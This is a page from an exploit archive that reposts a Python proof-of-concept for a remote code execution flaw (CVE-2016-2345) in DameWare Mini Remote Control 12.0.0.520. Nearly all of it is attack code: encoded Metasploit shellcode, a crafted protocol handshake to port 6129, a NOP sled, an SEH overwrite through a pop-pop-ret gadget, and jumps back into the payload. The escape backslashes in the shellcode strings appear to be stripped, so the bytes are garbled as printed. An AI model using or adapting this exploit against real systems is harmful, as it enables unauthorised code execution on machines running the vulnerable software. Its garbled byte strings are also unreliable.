Home / os / winmobile

DameWare Remote Controller 12.0.0.520 Remote Code Execution

Posted on 28 October 2017

# Exploit Title: Dameware Remote Controller RCE
# Date: 3-04-2016
# Exploit Author: Securifera
# Vendor Homepage: http://www.dameware.com/products/mini-remote-control/product-overview.aspx
# Version: 12.0.0.520
# Website: https://www.securifera.com/blog/2016/04/03/fun-with-remote-controllers-dameware-mini-remote-control-cve-2016-2345/
# CVE : CVE-2016-2345

import socket
import sys
import os
import time
import struct
import binascii
import random

# windows/exec - 220 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
sc = ""
sc += "xbax01xa8x4fx9exd9xcaxd9x74x24xf4x5ex29"
sc += "xc9xb1x31x31x56x13x03x56x13x83xeexfdx4a"
sc += "xbax62x15x08x45x9bxe5x6dxcfx7exd4xadxab"
sc += "x0bx46x1exbfx5ex6axd5xedx4axf9x9bx39x7c"
sc += "x4ax11x1cxb3x4bx0ax5cxd2xcfx51xb1x34xee"
sc += "x99xc4x35x37xc7x25x67xe0x83x98x98x85xde"
sc += "x20x12xd5xcfx20xc7xadxeex01x56xa6xa8x81"
sc += "x58x6bxc1x8bx42x68xecx42xf8x5ax9ax54x28"
sc += "x93x63xfax15x1cx96x02x51x9ax49x71xabxd9"
sc += "xf4x82x68xa0x22x06x6bx02xa0xb0x57xb3x65"
sc += "x26x13xbfxc2x2cx7bxa3xd5xe1xf7xdfx5ex04"
sc += "xd8x56x24x23xfcx33xfex4axa5x99x51x72xb5"
sc += "x42x0dxd6xbdx6ex5ax6bx9cxe4x9dxf9x9ax4a"
sc += "x9dx01xa5xfaxf6x30x2ex95x81xccxe5xd2x7e"
sc += "x87xa4x72x17x4ex3dxc7x7ax71xebx0bx83xf2"
sc += "x1exf3x70xeax6axf6x3dxacx87x8ax2ex59xa8"
sc += "x39x4ex48xcbxdcxdcx10x22x7bx65xb2x3a"

port = 6129

if len (sys.argv) == 2:
(progname, host ) = sys.argv
else:
print len (sys.argv)
print 'Usage: {0} host'.format (sys.argv[0])
exit (1)

csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

type = 444.0
buf = struct.pack("I", 4400 ) #Init Version
buf += "xcc"*4
buf += struct.pack("d", type) #Minor Version
buf += struct.pack("d", type) #Minor Version
buf += (40 - len(buf)) * "C"
csock.send(buf)

wstr = "x90" * 0x10 #nop sled
wstr += sc #calc shellcode
wstr += "x90" * (0x2ac - 0x10 - len(sc))
wstr += "xebx06xffxff" #short jump forward
wstr += struct.pack("I", 0x00401161 ) #pop pop return gadget
wstr += "x90" * 3 #nop
wstr += "xe9x6bxfaxffxff" #short jump back to shellcode
wstr += "E" * 0xbc
wstr += ("%" + "x00" + "c" + "x00")*5

buf = struct.pack("I", 0x9c44) #msg type
buf += wstr #payload
buf += "x00" * (0x200) #null bytes
csock.send(buf)

print binascii.hexlify(csock.recv(0x4000)) #necessary reads
print binascii.hexlify(csock.recv(0x4000))

csock.close()

 

TOP

Malware :

Exploits :